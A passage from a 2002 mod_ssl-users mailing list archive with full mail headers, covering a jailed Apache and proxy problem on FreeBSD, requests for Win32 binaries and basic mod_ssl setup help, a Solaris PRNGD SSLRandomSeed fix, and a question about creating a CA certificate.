It sounds like yer jail is lacking the libs and devices for this access.
Now, whether or not your jail will be safe if you move what's required to
get this to function within the jail is another matter you will have to
determine after setting up a working jailed testbed with those items.
lsof and various other tools are you friend in this endeavor.  One of the
recent system admin editions had a good article on how to work through the
process of setting up jailed applications I think it was the last months
or two months back edition.

> 
> Maybe someone can guide me towards proper proxy? Things like mod_real_ip should not help much, and I'm still trying to make pound (http://www.apsis.ch/pound/) to work.
> 
> Having received https connection via some proxy, how can I pass SSL variables by the easiest way?
> 
> 


Thanks,


Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 21 22:38:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA15884; Thu, 21 Nov 2002 22:36:32 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from webmail.sub.ru id WAA15859; Thu, 21 Nov 2002 22:35:56 +0100 (MET)
Received: (qmail 90160 invoked by uid 0); 21 Nov 2002 21:36:41 -0000
Received: from unknown (HELO shuttle.svib.ru) (195.54.219.242)
  by webmail.sub.ru with SMTP; 21 Nov 2002 21:36:41 -0000
Date: Fri, 22 Nov 2002 00:35:06 +0300
From: Alex Povolotsky 
To: modssl-users@modssl.org
Subject: Re: Problem with... proxy? Module? Or what?
Message-Id: <20021122003506.4fe70819.tarkhil@webmail.sub.ru>
In-Reply-To: 
References: <20021121223559.17535a76.tarkhil@webmail.sub.ru>
	
Organization: sub.ru
X-Mailer: Sylpheed version 0.8.2claws (GTK+ 1.2.10; i386-portbld-freebsd4.4)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Povolotsky 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 21 Nov 2002 15:25:20 -0500 (EST)
"R. DuFresne"  wrote:

RD> > I'm running FreeBSD, and apache/mod_ssl with virtual hosts in RD> It sounds like yer jail is lacking the libs and devices for this access.

libs exists; device exists. I'm getting IOCTL error trying to access /dev/ipl.

Nov 21 20:11:01 class-a tproxy[52225]: ioctl(SIOCGNATL): Bad address

Maybe, ipfilter requires kmem or mem; in this case, I'm surely helpless. 
RD> recent system admin editions had a good article on how to work through the
RD> process of setting up jailed applications I think it was the last months
RD> or two months back edition.

URL? I don't think I'll be able to get hold on it in reasonable time... 


-- 
Alex.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 22 00:06:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA19164; Fri, 22 Nov 2002 00:05:21 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id AAA19152; Fri, 22 Nov 2002 00:04:23 +0100 (MET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id SAA18363;
	Thu, 21 Nov 2002 18:04:25 -0500
Date: Thu, 21 Nov 2002 18:04:24 -0500 (EST)
From: "R. DuFresne" 
To: Alex Povolotsky 
cc: modssl-users@modssl.org
Subject: Re: Problem with... proxy? Module? Or what?
In-Reply-To: <20021122003506.4fe70819.tarkhil@webmail.sub.ru>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, 22 Nov 2002, Alex Povolotsky wrote:

> On Thu, 21 Nov 2002 15:25:20 -0500 (EST)
> "R. DuFresne"  wrote:
> 
> RD> > I'm running FreeBSD, and apache/mod_ssl with virtual hosts in RD> It sounds like yer jail is lacking the libs and devices for this access.
> 
> libs exists; device exists. I'm getting IOCTL error trying to access /dev/ipl.
> 
> Nov 21 20:11:01 class-a tproxy[52225]: ioctl(SIOCGNATL): Bad address
> 
> Maybe, ipfilter requires kmem or mem; in this case, I'm surely helpless. 
> RD> recent system admin editions had a good article on how to work through the
> RD> process of setting up jailed applications I think it was the last months
> RD> or two months back edition.
> 
> URL? I don't think I'll be able to get hold on it in reasonable time... 
> 
> 
> 

If you're in that much of a time pinch hopefully you googled for it
yourself, rather then waiting on me :

http://www.sysadminmag.com/

Look at the past couple of issues, the article should be in there on
jailing deamons.  Which I did not locate with a quick search on the site
with the term 'jail' yet there were at least 5  articles found with that
term relating to this, at least one specific to freebsd.  Searching with
the term chroot produces more results and between the two, should locate
information to help you here.

Thanks,


Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 22 09:47:50 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA06008; Fri, 22 Nov 2002 09:46:24 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from webmail.sub.ru id JAA05994; Fri, 22 Nov 2002 09:45:54 +0100 (MET)
Received: (qmail 80691 invoked by uid 0); 22 Nov 2002 08:46:36 -0000
Received: from unknown (HELO shuttle.svib.ru) (195.54.219.242)
  by webmail.sub.ru with SMTP; 22 Nov 2002 08:46:36 -0000
Date: Fri, 22 Nov 2002 11:45:06 +0300
From: Alex Povolotsky 
To: modssl-users@modssl.org
Subject: Re: Problem with... proxy? Module? Or what?
Message-Id: <20021122114506.76d9a5dd.tarkhil@webmail.sub.ru>
In-Reply-To: 
References: <20021122003506.4fe70819.tarkhil@webmail.sub.ru>
	
Organization: sub.ru
X-Mailer: Sylpheed version 0.8.2claws (GTK+ 1.2.10; i386-portbld-freebsd4.4)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Povolotsky 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 21 Nov 2002 18:04:24 -0500 (EST)
"R. DuFresne"  wrote:

RD> > RD> recent system admin editions had a good article on how to work through the
RD> > RD> process of setting up jailed applications I think it was the last months
RD> > RD> or two months back edition.
RD> > 
RD> > URL? I don't think I'll be able to get hold on it in reasonable time... 
RD> If you're in that much of a time pinch hopefully you googled for it
RD> yourself, rather then waiting on me :
RD> 
RD> http://www.sysadminmag.com/
Thanks. Last evening I was too sleepy to google it out. However, all articles I was able to found are more than one year old, and they doesn't answer my question - jail'ed virtual https.

What is 'CONNECT' method used by squid to proxy https connection? RFC number is enough. As far as I understand, my only option is to use non-jailed proxy that provide https, but what is the least painful way to pass ssl-related variables to jailed apache?

-- 
Alex.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 22 11:51:36 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA10088; Fri, 22 Nov 2002 11:50:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA10073; Fri, 22 Nov 2002 11:49:14 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id BA7E24CE744; Fri, 22 Nov 2002 11:49:13 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 9E2A428695; Fri, 22 Nov 2002 11:48:37 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web20804.mail.yahoo.com id LAA09523; Fri, 22 Nov 2002 11:22:19 +0100 (MET)
Message-ID: <20021122102215.82866.qmail@web20804.mail.yahoo.com>
Received: from [202.84.131.70] by web20804.mail.yahoo.com via HTTP; Fri, 22 Nov 2002 18:22:15 CST
Date: Fri, 22 Nov 2002 18:22:15 +0800 (CST)
From: =?iso-8859-1?q?lau=20bella?= 
Subject: Apache 1.3.27 win32.zip
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-1000973075-1037960535=:82332"
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?q?lau=20bella?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

--0-1000973075-1037960535=:82332
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit


Hi,

Instead of downloading tar.gz format, where can I download "Apache 1.3.27 with mod_ssl 2.8.12" in win32 zip format ? 

 



---------------------------------
Do You Yahoo!?
Get your free @yahoo.com.hk address at Yahoo! Mail.

--0-1000973075-1037960535=:82332
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit


Hi,


Instead of downloading tar.gz format, where can I download "Apache 1.3.27 with mod_ssl 2.8.12" in win32 zip format ? 


 

Do You Yahoo!?
Get your free @yahoo.com.hk address at Yahoo! Mail.

--0-1000973075-1037960535=:82332--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 22 13:07:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA12803; Fri, 22 Nov 2002 13:06:21 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from Proxy2.ensino.net id NAA12606; Fri, 22 Nov 2002 13:05:09 +0100 (MET)
Received: from giba ([10.11.2.7])
	by Proxy2.ensino.net (8.11.6/8.11.1) with SMTP id gAMBrjq43028
	for ; Fri, 22 Nov 2002 09:53:46 -0200 (BRST)
	(envelope-from garcia@ensino.net)
Message-ID: <002801c29220$866e9cc0$07020b0a@DOMAIN>
From: "Gilberto Garcia Jr." 
To: "mod ssl" 
Subject: =?iso-8859-1?Q?can=B4t_configure_mod=5Fssl?=
Date: Fri, 22 Nov 2002 10:12:21 -0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0025_01C2920F.A56DDAC0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilberto Garcia Jr." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0025_01C2920F.A56DDAC0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hey guys,

Can someone explain me how configure mod_ssl on apchache web server? I =
have installed apache with mod_ssl on a red hat 7.3

thanks


------=_NextPart_000_0025_01C2920F.A56DDAC0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hey guys,


 


Can someone explain me how configure =
mod_ssl on=20
apchache web server? I have installed apache with mod_ssl on a red hat=20
7.3


 


thanks


 


------=_NextPart_000_0025_01C2920F.A56DDAC0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 22 13:40:41 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA14397; Fri, 22 Nov 2002 13:39:15 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA14386; Fri, 22 Nov 2002 13:38:46 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C0CB44CE691; Fri, 22 Nov 2002 13:38:45 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id D9A982867F; Fri, 22 Nov 2002 13:28:46 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns2.bln1.siemens.de id NAA13582; Fri, 22 Nov 2002 13:19:48 +0100 (MET)
Received: from mail.bln1.siemens.de (stbf6582 [194.138.127.68])
	by ns2.bln1.siemens.de (8.9.3/8.9.3) with ESMTP id NAA27467
	for ; Fri, 22 Nov 2002 13:19:31 +0100 (MET)
Received: from sietec.de (localhost [127.0.0.1])
	by mail.bln1.siemens.de (8.11.6+Sun/8.11.6) with ESMTP id gAMCJV221408
	for ; Fri, 22 Nov 2002 13:19:31 +0100 (MET)
Message-ID: <3DDE20D3.1000601@sietec.de>
Date: Fri, 22 Nov 2002 13:19:31 +0100
From: Alex Kuehne 
Organization: SAG
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.1) Gecko/20020826
X-Accept-Language: en,de
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Solaris 7 & 8: Problem and solution with mod_ssl and PRNGD when updating
 to 1.3.27
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Kuehne 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi folks,

I am curently updating all my apache server to the newest version of 
apache/mod_ssl/openssl, at
least I tried until I found the solution.

I get an error when starting the freshly compiled apache 1.3.27 with 
config from 1.3.26:

[Fri Nov 22 11:56:43 2002] [error] mod_ssl: Init: Failed to generate 
temporary 5
12 bit RSA private key (OpenSSL library error follows)
[Fri Nov 22 11:56:43 2002] [error] OpenSSL: error:24064064:random number 
generat
or:SSLEAY_RAND_BYTES:PRNG not seeded
[Fri Nov 22 11:56:43 2002] [error] OpenSSL: error:04069003:rsa 
routines:RSA_gene
rate_key:BN lib

I know this is because under Solaris<9 there is no /dev/(u)random. So I 
use the prngd
daemon by Lutz Jaenicke since ever.

My working configuration in httpd.conf from version 1.3.26/2.8.10 is:

SSLRandomSeed startup egd:/etc/egd-pool
SSLRandomSeed connect egd:/etc/egd-pool

But this does not work with 1.3.27/2.8.12 obviously.

The solution is appendig the bytes you wish to get from prngd:

SSLRandomSeed startup egd:/etc/egd-pool 512
SSLRandomSeed connect egd:/etc/egd-pool 512

As far as I searched this is not documented. Please can anyone insert 
this into
the documentation chapter 3?

Thanks and regards
Alex Kuehne



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 22 15:20:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA18529; Fri, 22 Nov 2002 15:19:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id PAA18525; Fri, 22 Nov 2002 15:18:50 +0100 (MET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.12.6/8.12.6) with ESMTP id gAMEIdfr021601
	for ; Fri, 22 Nov 2002 15:18:39 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gAMEIcEm024468
	for ; Fri, 22 Nov 2002 15:18:38 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: =?iso-8859-1?Q?RE:_can=B4t_configure_mod=5Fssl?=
Date: Fri, 22 Nov 2002 15:18:38 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A56F@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: =?iso-8859-1?Q?can=B4t_configure_mod=5Fssl?=
Thread-Index: AcKSH+rEPr9mTkHgTc+8eercqCJvPwAEgheg
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA18526
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Have you tried?

Post your attempted config directives and describe what happened or went
wrong and I'm sure someone will respond.

-----Original Message-----
From: Gilberto Garcia Jr. [mailto:garcia@ensino.net]
Sent: Freitag, 22. November 2002 13:12
To: mod ssl
Subject: can´t configure mod_ssl


Hey guys,

Can someone explain me how configure mod_ssl on apchache web server? I
have installed apache with mod_ssl on a red hat 7.3

thanks

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 22 15:36:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA18849; Fri, 22 Nov 2002 15:35:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts8-srv.bellnexxia.net id PAA18844; Fri, 22 Nov 2002 15:34:55 +0100 (MET)
Received: from sympatico.ca ([64.231.121.188]) by tomts8-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021122143453.URLA24515.tomts8-srv.bellnexxia.net@sympatico.ca>
          for ; Fri, 22 Nov 2002 09:34:53 -0500
Message-ID: <3DDE4092.5090204@sympatico.ca>
Date: Fri, 22 Nov 2002 09:34:58 -0500
From: hunter 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020623 Debian/1.0.0-0.woody.1
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.27 win32.zip
References: <20021122102215.82866.qmail@web20804.mail.yahoo.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

lau bella wrote:
> Hi,
> 
> Instead of downloading tar.gz format, where can I download "Apache 
> 1.3.27 with mod_ssl 2.8.12" in win32 zip format ?
> 
>  
> 
> 
> ------------------------------------------------------------------------
> *Do You Yahoo!?*
> Get your free @yahoo.com.hk address at Yahoo! Mail 
> .

If you are only after binaries, you can get them from me (hunter)...

(preferred)

http://hunter.campbus.com/Apache_1.3.27-Mod_SSL_2.8.12-OpenSSL_0.9.6g-Win32.zip
http://hunter.campbus.com/Openssl-0.9.6g-Win32.zip

http://hunter.campbus.com/Apache_2.0.43-OpenSSL_0.9.6g-Win32.zip

or

(limited bandwidth)

http://tor.ath.cx/~hunter/apache/Apache_1.3.27-Mod_SSL_2.8.12-OpenSSL_0.9.6g-Win32.zip
http://tor.ath.cx/~hunter/apache/Openssl-0.9.6g-Win32.zip

http://tor.ath.cx/~hunter/apache/Apache_2.0.43-OpenSSL_0.9.6g-Win32.zip


If you want the source repackaged in a zip, I could do that as well, but 
Apache 1.3.27 and mod_ssl 2.8.12 are not bundled together normally and 
neither are they bundled with the OpenSSL.

If you are after the source and you can be a little more specific, I 
will see what I can do for you.

These binaries do not have an installer ... you must configure and test 
the code - I have done nothing beyond making the binaries and placing 
them in the correct subdirectories with icons and such (this is done by 
the makefile).  The HTTP and SSL are not configure nor are certificates 
generated.

hunter



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 22 15:36:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA18854; Fri, 22 Nov 2002 15:35:15 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from Proxy2.ensino.net id PAA18842; Fri, 22 Nov 2002 15:34:46 +0100 (MET)
Received: from giba ([10.11.2.7])
	by Proxy2.ensino.net (8.11.6/8.11.1) with SMTP id gAMENLq44484
	for ; Fri, 22 Nov 2002 12:23:22 -0200 (BRST)
	(envelope-from garcia@ensino.net)
Message-ID: <000a01c29235$6d7b14e0$07020b0a@DOMAIN>
From: "Gilberto Garcia Jr." 
To: "mod ssl" 
Subject: =?iso-8859-1?Q?can=B4t_configure_mod=5Fssl?=
Date: Fri, 22 Nov 2002 12:42:47 -0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0007_01C29224.A9320220"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilberto Garcia Jr." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0007_01C29224.A9320220
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Yes, i=B4ve tried.

I followed a lot of tutorials. i create one certificade at all.

But weh i tried $curl https://127.0.0.1/ i got an error.

and in most of tutorials i saw httpsd start command, and httpdctl =
startssl command. but i didint find both of executables om my server.

thanks

------=_NextPart_000_0007_01C29224.A9320220
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Yes, i=B4ve tried.


 


I followed a lot of tutorials. i create =
one=20
certificade at all.


 


But weh i tried $curl https://127.0.0.1/ i got an =
error.


 


and in most of tutorials i saw httpsd =
start=20
command, and httpdctl startssl command. but i didint find both of =
executables om=20
my server.


 


thanks


------=_NextPart_000_0007_01C29224.A9320220--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 22 15:48:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA19223; Fri, 22 Nov 2002 15:47:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id PAA19219; Fri, 22 Nov 2002 15:46:37 +0100 (MET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.12.6/8.12.6) with ESMTP id gAMEkafr023477
	for ; Fri, 22 Nov 2002 15:46:36 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gAMEkZEm025661
	for ; Fri, 22 Nov 2002 15:46:36 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: =?iso-8859-1?Q?RE:_can=B4t_configure_mod=5Fssl?=
Date: Fri, 22 Nov 2002 15:46:35 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A570@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: =?iso-8859-1?Q?can=B4t_configure_mod=5Fssl?=
Thread-Index: AcKSNWNARpkuiQxMTDKbd/BbH9PuxgAACv6g
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA19220
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You have to describe clearly what you did.
- Post the extract of httpd.conf which defines your SSL virtual host
- cut'n'paste the command you are using to start apache in SSL
- post the *exact* error you receive 
- post any messages which appear in the ssl_engine_log and/or error_log

Then we might be able to help.

-----Original Message-----
From: Gilberto Garcia Jr. [mailto:garcia@ensino.net]
Sent: Freitag, 22. November 2002 15:43
To: mod ssl
Subject: can´t configure mod_ssl


Yes, i´ve tried.

I followed a lot of tutorials. i create one certificade at all.

But weh i tried $curl https://127.0.0.1/ i got an error.

and in most of tutorials i saw httpsd start command, and httpdctl
startssl command. but i didint find both of executables om my server.

thanks

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 22 16:12:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA20714; Fri, 22 Nov 2002 16:11:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mx2.isigateway.com id QAA20709; Fri, 22 Nov 2002 16:10:48 +0100 (MET)
Received: (qmail 8355 invoked from network); 22 Nov 2002 15:23:47 -0000
Received: from unknown (HELO galahad.isinet.com) (199.4.155.10)
  by mx2.isigateway.com with SMTP; 22 Nov 2002 15:23:47 -0000
Received: (qmail 30139 invoked from network); 22 Nov 2002 15:08:08 -0000
Received: from isi-mail.isinet.com (198.62.99.181)
  by galahad.isinet.com with SMTP; 22 Nov 2002 15:08:08 -0000
Received: by isi-mail.isinet.com with Internet Mail Service (5.5.2653.19)
	id ; Fri, 22 Nov 2002 10:10:06 -0500
Message-ID: <92F9C07FBAB86D4D9B76656180AC94774A0D42@isi-mail.isinet.com>
From: "Long, Liesheng" 
To: "'modssl-users@modssl.org'" 
Subject: Certificate Authority certificate
Date: Fri, 22 Nov 2002 10:10:06 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C29239.3D629FE0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Long, Liesheng" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C29239.3D629FE0
Content-Type: text/plain

Hi folks,

 

I just compiled a fresh apache 1.3.27 with mod_ssl 2.8.12 and openssl 0.9.6g
. We need a Secure Server for internal testing purpose, and I made my own
certificate. The problem is browsers keep pop-up warning. How do I tell IE
and Netscape that the certificate of my server is valid, i.e., how do I
create a Certificate Authority certificate, and load it into IE and
Netscape. Thanks a lot.

 

Best Regards,

 

Liesheng Long


------_=_NextPart_001_01C29239.3D629FE0
Content-Type: text/html



















Hi folks,



 



I just compiled a fresh apache 1.3.27 with mod_ssl
2.8.12
and openssl 0.9.6g . We need a Secure Server for internal testing purpose, and
I made my own certificate. The problem is browsers keep pop-up warning. How do
I tell IE and Netscape that the certificate of my server is valid, i.e., how do
I create a Certificate Authority certificate, and load it into IE and Netscape.
Thanks a lot.



 



Best Regards,



 



Liesheng Long









------_=_NextPart_001_01C29239.3D629FE0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 22 18:51:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA27792; Fri, 22 Nov 2002 18:50:08 +0100 (MET)
